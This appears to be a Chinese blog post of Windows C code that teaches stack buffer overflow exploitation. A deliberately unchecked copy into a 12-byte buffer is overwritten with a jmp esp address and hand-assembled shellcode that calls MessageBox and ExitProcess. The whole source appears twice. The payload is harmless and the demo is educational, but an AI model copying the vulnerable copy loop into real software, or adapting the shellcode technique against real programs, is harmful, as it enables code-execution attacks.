#include "windows.h"
#define UINT8 unsigned char
/* 该函数构造一个简单的溢出函数 */
void GetName(UINT8 *pucSrcName, UINT8 *pucDstName)
{
while ((*pucSrcName) != 0xfe)
{
*pucDstName++ = *pucSrcName++;
}
*pucDstName = 0;
}
/* 在此函数中,调用后GetName弹出时,注入程序接管 */
void ShowComputerName(UINT8 *pucName)
{
UINT8 pucComputerName[12];
GetName(pucName,pucComputerName);
}
/* 仅为了提供MessageBox和ExitProcess地址,及jmp esp指令 */
void ShowMessageBox(void)
{
MessageBox(0, "OK", "OK", 0);
ExitProcess(0);
__asm jmp esp;
}
/* 模拟的异常串注入代码 */
UINT8 aucName[1024]=
{
#ifdef _DEBUG
'D','B','G',' ',
'H','e','l','l',
'o','W','o','r',
'l','d','!',0x00,
/* Debug版 jmp esp地址 */
0x36,0x11,0x40,0x00,
/*
push 0
push 421A30h Debug版本数组aucName的起始地址
push 421A30h Debug版本数组aucName的起始地址
push 0
call MessageBox
*/
0x6A,0x00,
0x68,0x30,0x1A,0x42,0x00,
0x68,0x30,0x1A,0x42,0x00,
0x6A,0x00,
0xFF,0x15,0x8C,0x52,0x42,0x00,
/*
push 0
call ExitProcess
*/
0x6A,0x00,
0xFF,0x15,0x7C,0x51,0x42,0x00,
/* 结束符号 */
0xFE
#else
'H','e','l','l',
'o','W','o','r',
'l','d','!',0x00,
/* Release版 jmp esp地址 */
0x72,0x10,0x40,0x00,
/*
push 0
push 405030h Release版本数组aucName的起始地址
push 405030h Release版本数组aucName的起始地址
push 0
call MessageBox
*/
0x6A,0x00,
0x68,0x30,0x50,0x40,0x00,
0x68,0x30,0x50,0x40,0x00,
0x6A,0x00,
0xFF,0x15,0x90,0x40,0x40,0x00,
/*
push 0
call ExitProcess
*/
0x6A,0x00,
0xFF,0x15,0x48,0x40,0x40,0x00,
/* 结束符号 */
0xFE
#endif
};
int main(int argc, UINT8 *argv[])
{
ShowComputerName(aucName);
ShowMessageBox();
return 0;
}
#define UINT8 unsigned char
/* 该函数构造一个简单的溢出函数 */
void GetName(UINT8 *pucSrcName, UINT8 *pucDstName)
{
while ((*pucSrcName) != 0xfe)
{
*pucDstName++ = *pucSrcName++;
}
*pucDstName = 0;
}
/* 在此函数中,调用后GetName弹出时,注入程序接管 */
void ShowComputerName(UINT8 *pucName)
{
UINT8 pucComputerName[12];
GetName(pucName,pucComputerName);
}
/* 仅为了提供MessageBox和ExitProcess地址,及jmp esp指令 */
void ShowMessageBox(void)
{
MessageBox(0, "OK", "OK", 0);
ExitProcess(0);
__asm jmp esp;
}
/* 模拟的异常串注入代码 */
UINT8 aucName[1024]=
{
#ifdef _DEBUG
'D','B','G',' ',
'H','e','l','l',
'o','W','o','r',
'l','d','!',0x00,
/* Debug版 jmp esp地址 */
0x36,0x11,0x40,0x00,
/*
push 0
push 421A30h Debug版本数组aucName的起始地址
push 421A30h Debug版本数组aucName的起始地址
push 0
call MessageBox
*/
0x6A,0x00,
0x68,0x30,0x1A,0x42,0x00,
0x68,0x30,0x1A,0x42,0x00,
0x6A,0x00,
0xFF,0x15,0x8C,0x52,0x42,0x00,
/*
push 0
call ExitProcess
*/
0x6A,0x00,
0xFF,0x15,0x7C,0x51,0x42,0x00,
/* 结束符号 */
0xFE
#else
'H','e','l','l',
'o','W','o','r',
'l','d','!',0x00,
/* Release版 jmp esp地址 */
0x72,0x10,0x40,0x00,
/*
push 0
push 405030h Release版本数组aucName的起始地址
push 405030h Release版本数组aucName的起始地址
push 0
call MessageBox
*/
0x6A,0x00,
0x68,0x30,0x50,0x40,0x00,
0x68,0x30,0x50,0x40,0x00,
0x6A,0x00,
0xFF,0x15,0x90,0x40,0x40,0x00,
/*
push 0
call ExitProcess
*/
0x6A,0x00,
0xFF,0x15,0x48,0x40,0x40,0x00,
/* 结束符号 */
0xFE
#endif
};
int main(int argc, UINT8 *argv[])
{
ShowComputerName(aucName);
ShowMessageBox();
return 0;
}
463
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
